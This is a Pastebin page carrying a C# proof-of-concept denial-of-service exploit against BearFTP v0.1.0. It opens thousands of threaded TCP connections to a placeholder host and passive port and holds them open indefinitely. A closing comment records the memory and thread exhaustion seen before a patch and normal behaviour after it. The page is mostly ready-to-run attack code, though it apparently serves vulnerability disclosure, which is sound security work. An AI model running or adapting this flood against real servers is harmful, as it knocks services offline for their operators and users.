Advertisement
Guest User

BearFTP v0.1.0 Proof Of Concept

a guest
Jan 29th, 2020
2,187
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. static void Main(string[] args)
  2.         {
  3.             Console.WriteLine("DoS started. Approx. time to complete: 204 seconds.");
  4.             for (int i = 0; i < 1024*8; i++) // We will do 8000+ connections. Usually server only spawns half of them.
  5.             {
  6.                 new Thread(() =>
  7.                 {
  8.                     Thread.CurrentThread.IsBackground = true;
  9.  
  10.                     TcpClient exploit = new TcpClient("HOSTNAME", PASV_PORT); //Replace with actual data to test it.
  11.                     var ns = exploit.GetStream();
  12.                     StreamWriter sw = new StreamWriter(ns);
  13.                     sw.AutoFlush = true;
  14.                     StreamReader sr = new StreamReader(ns);
  15.  
  16.  
  17.                     while (true)
  18.                     {
  19.                         Thread.Sleep(5000); //We just spend our time.
  20.                     }
  21.                 }).Start();
  22.                 Thread.Sleep(25); //Spawn a new connection every 25ms so we don't kill our own connection.
  23.             }
  24.             while (true)
  25.             {
  26.                 Console.WriteLine("DoS attack completed!");
  27.                 Thread.Sleep(20000);
  28.             }
  29.         }
  30. /*
  31. BEFORE PATCH APPLIED (after ~100 seconds of attacking):
  32. 3700 threads spawned, VIRT went from 3388M to 32.1G, RES from 60000 to 129M. CPU usage ~10%. The server struggles to process commands. Recovers in several minutes after the attack is stopped
  33. AFTER PATCH APPLIED:
  34. 10 threads spawned at most, VIRT didnt change, RES didnt change. CPU usage ~3%. Works fine. */
Advertisement
RAW Paste Data Copied
Advertisement